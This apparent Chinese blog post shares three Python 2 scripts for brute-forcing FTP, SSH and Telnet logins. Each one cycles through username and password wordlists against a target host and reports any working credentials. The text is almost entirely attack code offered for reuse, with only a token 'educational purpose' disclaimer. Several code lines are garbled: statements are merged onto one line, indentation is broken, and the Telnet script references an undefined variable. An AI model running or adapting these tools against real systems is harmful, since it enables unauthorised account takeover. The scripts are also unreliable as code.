Python脚本Ftp,SSH,TELNET密码暴力破解

Jumbo

在渗透测试当中，免不了要进行密码破解。细心的作者搜集了一些python暴力破解脚本，要与大家一起分享，非常有借鉴意义喔~快来看看都有哪些脚本吧，说不定就有你需要的喔
0×01
FTP暴力破解脚本

1. #!/usr/bin/env python   
   
2. #-*-coding = utf-8-*-   
   
3. #author:@xfk   
   
4. #blog:@blog.sina.com.cn/kaiyongdeng   
   
5. #date:@2012-05-08   
   
6.    
   
7. import sys, os, time     
   
8. from ftplib import FTP     
   
9. docs = """     
   
10.            [*] This was written for educational purpose and pentest only. Use it at your own risk.      
    
11.            [*] Author will be not responsible for any damage!     
    
12.            [*] Toolname : ftp_bf.py     
    
13.            [*] Coder :     
    
14.            [*] Version : 0.1     
    
15.            [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt     
    
16.        """     
    
17.    
    
18. if sys.platform == 'linux' or sys.platform == 'linux2':   
    
19.     clearing = 'clear'   
    
20. else:   
    
21.     clearing = 'cls'   
    
22. os.system(clearing)   
    
23. R = "\033[31m";     
    
24. G = "\033[32m";     
    
25. Y = "\033[33m"   
    
26. END = "\033[0m"   
    
27. def logo():   
    
28.     print G+"\n |---------------------------------------------------------------|"   
    
29.     print " | |"   
    
30.     print " | blog.sina.com.cn/kaiyongdeng |"   
    
31.     print " | 08/05/2012 ftp_bf.py v.0.1 |"   
    
32.     print " | FTP Brute Forcing Tool |"   
    
33.     print " | |"   
    
34.     print " |---------------------------------------------------------------|\n"   
    
35.     print " \n [-] %s\n" % time.strftime("%X")   
    
36.     print docs+END   
    
37.    
    
38. def help():   
    
39.     print R+"[*]-t, --target ip/hostname <> Our target"   
    
40.     print "[*]-u, --usernamelist usernamelist <> usernamelist path"   
    
41.     print "[*]-p, --passwordlist passwordlist <> passwordlist path"   
    
42.     print "[*]-h, --help help <> print this help"   
    
43.     print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit(1)   
    
44.    
    
45. def bf_login(hostname,username,password):   
    
46.     # sys.stdout.write("\r[!]Checking : %s " % (p))   
    
47.     # sys.stdout.flush()   
    
48.     try:   
    
49.         ftp = FTP(hostname)   
    
50.         ftp.login(hostname,username, password)   
    
51.         ftp.retrlines('list')   
    
52.         ftp.quit()   
    
53.         print Y+"\n[!] w00t,w00t!!! We did it ! "   
    
54.         print "[+] Target : ",hostname, ""   
    
55.         print "[+] User : ",username, ""   
    
56.         print "[+] Password : ",password, ""+END   
    
57.         return 1   
    
58.     # sys.exit(1)   
    
59.     except Exception, e:   
    
60.         pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END   
    
61.     sys.exit(1)   
    
62.    
    
63. def anon_login(hostname):   
    
64.     try:   
    
65.         print G+"\n[!] Checking for anonymous login.\n"+END   
    
66.         ftp = FTP(hostname) ftp.login()   
    
67.         ftp.retrlines('LIST')   
    
68.         print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END   
    
69.         ftp.quit()   
    
70.     except Exception, e:   
    
71.         print R+"\n[-] Anonymous login failed...\n"+END   
    
72.         pass   
    
73.    
    
74. def main():   
    
75.     logo()   
    
76.     try:   
    
77.         for arg in sys.argv:   
    
78.             if arg.lower() == '-t' or arg.lower() == '--target':   
    
79.                 hostname = sys.argv[int(sys.argv[1:].index(arg))+2]   
    
80.             elif arg.lower() == '-u' or arg.lower() == '--usernamelist':   
    
81.                 usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]   
    
82.             elif arg.lower() == '-p' or arg.lower() == '--passwordlist':   
    
83.                 passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]   
    
84.             elif arg.lower() == '-h' or arg.lower() == '--help':   
    
85.                 help()   
    
86.             elif len(sys.argv) <= 1:   
    
87.                 help()   
    
88.     except:   
    
89.         print R+"[-]Cheak your parametars input\n"+END   
    
90.         help()   
    
91.             
    
92.     print G+"[!] BruteForcing target ..."+END   
    
93.     anon_login(hostname)   
    
94.     # print "here is ok"   
    
95.     # print hostname   
    
96.     try:   
    
97.         usernames = open(usernamelist, "r")   
    
98.         user = usernames.readlines()   
    
99.         count1 = 0   
    
100.         while count1 < len(user):   
     
101.             user[count1] = user[count1].strip()   
     
102.             count1 +=1   
     
103.     except:   
     
104.         print R+"\n[-] Cheak your usernamelist path\n"+END   
     
105.         sys.exit(1)   
     
106.             
     
107.     # print "here is ok ",usernamelist,passwordlist   
     
108.     try:   
     
109.         passwords = open(passwordlist, "r")   
     
110.         pwd = passwords.readlines()   
     
111.         count2 = 0   
     
112.         while count2 < len(pwd):   
     
113.             pwd[count2] = pwd[count2].strip()   
     
114.             count2 +=1   
     
115.     except:   
     
116.         print R+"\n[-] Check your passwordlist path\n"+END   
     
117.         sys.exit(1)   
     
118.    
     
119.     print G+"\n[+] Loaded:",len(user),"usernames"   
     
120.     print "\n[+] Loaded:",len(pwd),"passwords"   
     
121.     print "[+] Target:",hostname   
     
122.     print "[+] Guessing...\n"+END   
     
123.     for u in user: for p in pwd:   
     
124.         result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))   
     
125.         if result != 1:   
     
126.             print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END   
     
127.         else:   
     
128.             print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END   
     
129.         if not result :   
     
130.             print R+"\n[-]There is no username ans password enabled in the list."   
     
131.             print "[-]Exiting...\n"+END   
     
132.    
     
133. if __name__ == "__main__":   
     
134.     main()   

复制代码

0×02
SSH暴力破解

1. #!/usr/bin/env python   
   
2. 
   
3. #-*-coding = UTF-8-*-   
   
4. #author@:dengyongkai   
   
5. #blog@:blog.sina.com.cn/kaiyongdeng   
   
6.    
   
7.    
   
8. import sys   
   
9. import os   
   
10. import time   
    
11. #from threading import Thread   
    
12.    
    
13. try:   
    
14.     from paramiko import SSHClient   
    
15.     from paramiko import AutoAddPolicy   
    
16. except ImportError:   
    
17.     print G+'''''''   
    
18.     You need paramiko module.   
    
19.    
    
20. http://www.lag.net/paramiko/   
    
21.    
    
22.     Debian/Ubuntu: sudo apt-get install aptitude   
    
23.          : sudo aptitude install python-paramiko\n'''+END   
    
24.     sys.exit(1)   
    
25.    
    
26. docs =  """   
    
27.             [*] This was written for educational purpose and pentest only. Use it at your own risk.   
    
28.             [*] Author will be not responsible for any damage!                                                                  
    
29.             [*] Toolname        : ssh_bf.py   
    
30.             [*] Author          : xfk   
    
31.             [*] Version         : v.0.2   
    
32.             [*] Example of use  : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]   
    
33.     """   
    
34.    
    
35.    
    
36. if sys.platform == 'linux' or sys.platform == 'linux2':   
    
37.          clearing = 'clear'   
    
38. else:      
    
39.          clearing = 'cls'   
    
40. os.system(clearing)   
    
41.    
    
42.    
    
43. R = "\033[31m";   
    
44. G = "\033[32m";   
    
45. Y = "\033[33m"   
    
46. END = "\033[0m"   
    
47.    
    
48.    
    
49. def logo():   
    
50.          print G+"\n                |---------------------------------------------------------------|"   
    
51.          print "                |                                                               |"   
    
52.          print "                |               blog.sina.com.cn/kaiyongdeng                    |"   
    
53.          print "                |                16/05/2012 ssh_bf.py v.0.2                     |"   
    
54.          print "                |                  SSH Brute Forcing Tool                       |"   
    
55.          print "                |                                                               |"   
    
56.          print "                |---------------------------------------------------------------|\n"   
    
57.          print " \n                     [-] %s\n" % time.ctime()   
    
58.          print docs+END   
    
59.    
    
60.    
    
61. def help():   
    
62.     print Y+"       [*]-H       --hostname/ip       <>the target hostname or ip address"   
    
63.     print "     [*]-P       --port          <>the ssh service port(default is 22)"   
    
64.     print "     [*]-U       --usernamelist      <>usernames list file"   
    
65.     print "     [*]-P       --passwordlist      <>passwords list file"   
    
66.     print "     [*]-H       --help          <>show help information"   
    
67.     print "     [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END   
    
68.     sys.exit(1)   
    
69.         
    
70. def BruteForce(hostname,port,username,password):   
    
71.         '''''''   
    
72.         Create SSH connection to target   
    
73.         '''   
    
74.         ssh = SSHClient()   
    
75.         ssh.set_missing_host_key_policy(AutoAddPolicy())   
    
76.         try:   
    
77.             ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)   
    
78.             status = 'ok'   
    
79.             ssh.close()   
    
80.         except Exception, e:   
    
81.             status = 'error'   
    
82.             pass   
    
83.     return status   
    
84.    
    
85.    
    
86. def makelist(file):   
    
87.     '''''''   
    
88.     Make usernames and passwords lists   
    
89.     '''   
    
90.     items = []   
    
91.    
    
92.     try:   
    
93.         fd = open(file, 'r')   
    
94.     except IOError:   
    
95.         print R+'unable to read file \'%s\'' % file+END   
    
96.         pass   
    
97.    
    
98.     except Exception, e:   
    
99.         print R+'unknown error'+END   
    
100.         pass   
     
101.    
     
102.     for line in fd.readlines():   
     
103.         item = line.replace('\n', '').replace('\r', '')   
     
104.         items.append(item)   
     
105.     fd.close()      
     
106.     return items   
     
107.    
     
108. def main():   
     
109.         logo()      
     
110. #   print "hello wold"   
     
111.         try:        
     
112.                 for arg in sys.argv:   
     
113.                         if arg.lower() == '-t' or arg.lower() == '--target':   
     
114.                                 hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2])   
     
115.                 if arg.lower() == '-p' or arg.lower() == '--port':   
     
116.                     port = sys.argv[int(sys.argv[1:].index(arg))+2]   
     
117.                         elif arg.lower() == '-u' or arg.lower() == '--userlist':   
     
118.                                 userlist = sys.argv[int(sys.argv[1:].index(arg))+2]   
     
119.                         elif arg.lower() == '-w' or arg.lower() == '--wordlist':   
     
120.                                 wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]   
     
121.                         elif arg.lower() == '-h' or arg.lower() == '--help':   
     
122.                                 help()   
     
123.             elif len(sys.argv) <= 1:   
     
124.                                 help()   
     
125.         except:     
     
126.                 print R+"[-]Cheak your parametars input\n"+END   
     
127.                 help()   
     
128.         print G+"\n[!] BruteForcing target ...\n"+END   
     
129. #        print "here is ok"   
     
130. #        print hostname,port,wordlist,userlist   
     
131.         usernamelist = makelist(userlist)   
     
132.         passwordlist = makelist(wordlist)   
     
133.    
     
134.         print Y+"[*] SSH Brute Force Praparing."   
     
135.         print "[*] %s user(s) loaded." % str(len(usernamelist))   
     
136.         print "[*] %s password(s) loaded." % str(len(passwordlist))   
     
137.         print "[*] Brute Force Is Starting......."+END   
     
138.     try:   
     
139.             for username in usernamelist:   
     
140.                 for password in passwordlist:   
     
141.                 print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END   
     
142.                         current = BruteForce(hostname, port, username, password)   
     
143.                             if current == 'error':   
     
144.                     print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END   
     
145. #                               pass   
     
146.                             else:   
     
147.                                     print G+"\n[+] ^-^ HaHa,We Got It!!!"   
     
148.                                     print "[+] username: %s" % username   
     
149.                                     print "[+] password: %s\n" % password+END   
     
150. #                                   sys.exit(0)   
     
151.     except:   
     
152.         print R+"\n[-] There Is Something Wrong,Pleace Cheak It."   
     
153.         print "[-] Exitting.....\n"+END   
     
154.         raise   
     
155.         print Y+"[+] Done.^-^\n"+END   
     
156.         sys.exit(0)   
     
157.    
     
158.    
     
159. if __name__ == "__main__":   
     
160.     main()   

复制代码

0×03
TELNET密码暴力破解

1. #!usr/bin/python   
   
2. 
   
3. #Telnet Brute Forcer   
   
4. #http://www.darkc0de.com   
   
5. #d3hydr8[at]gmail[dot]com   
   
6.    
   
7. import threading, time, random, sys, telnetlib   
   
8. from copy import copy   
   
9.    
   
10. if len(sys.argv) !=4:   
    
11.     print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"   
    
12.     sys.exit(1)   
    
13.    
    
14. try:   
    
15.     users = open(sys.argv[2], "r").readlines()   
    
16. except(IOError):     
    
17.     print "Error: Check your userlist path\n"   
    
18.     sys.exit(1)   
    
19.       
    
20. try:   
    
21.     words = open(sys.argv[3], "r").readlines()   
    
22. except(IOError):     
    
23.     print "Error: Check your wordlist path\n"   
    
24.     sys.exit(1)   
    
25.    
    
26. print "\n\t   d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0"   
    
27. print "\t--------------------------------------------------\n"   
    
28. print "[+] Server:",sys.argv[1]   
    
29. print "[+] Users Loaded:",len(users)   
    
30. print "[+] Words Loaded:",len(words),"\n"   
    
31.    
    
32. wordlist = copy(words)   
    
33.    
    
34. def reloader():   
    
35.     for word in wordlist:   
    
36.         words.append(word)   
    
37.    
    
38. def getword():   
    
39.     lock = threading.Lock()   
    
40.     lock.acquire()   
    
41.     if len(words) != 0:   
    
42.         value = random.sample(words,  1)   
    
43.         words.remove(value[0])   
    
44.             
    
45.     else:   
    
46.         print "\nReloading Wordlist - Changing User\n"   
    
47.         reloader()   
    
48.         value = random.sample(words,  1)   
    
49.         users.remove(users[0])   
    
50.             
    
51.     lock.release()   
    
52.     if len(users) ==1:   
    
53.         return value[0][:-1], users[0]   
    
54.     else:   
    
55.         return value[0][:-1], users[0][:-1]   
    
56.             
    
57. class Worker(threading.Thread):   
    
58.         
    
59.     def run(self):   
    
60.         value, user = getword()   
    
61.         try:   
    
62.             print "-"*12   
    
63.             print "User:",user,"Password:",value   
    
64.             tn = telnetlib.Telnet(sys.argv[1])   
    
65.             tn.read_until("login: ")   
    
66.             tn.write(user + "\n")   
    
67.             if password:   
    
68.                     tn.read_until("Password: ")   
    
69.                     tn.write(value + "\n")   
    
70.             tn.write("ls\n")   
    
71.             tn.write("exit\n")   
    
72.             print tn.read_all()   
    
73.             print "\t\nLogin successful:",value, user   
    
74.             tn.close()   
    
75.             work.join()   
    
76.             sys.exit(2)   
    
77.         except:     
    
78.             pass   
    
79.      
    
80. for I in range(len(words)*len(users)):   
    
81.     work = Worker()   
    
82.     work.start()   
    
83.     time.sleep(1)   

复制代码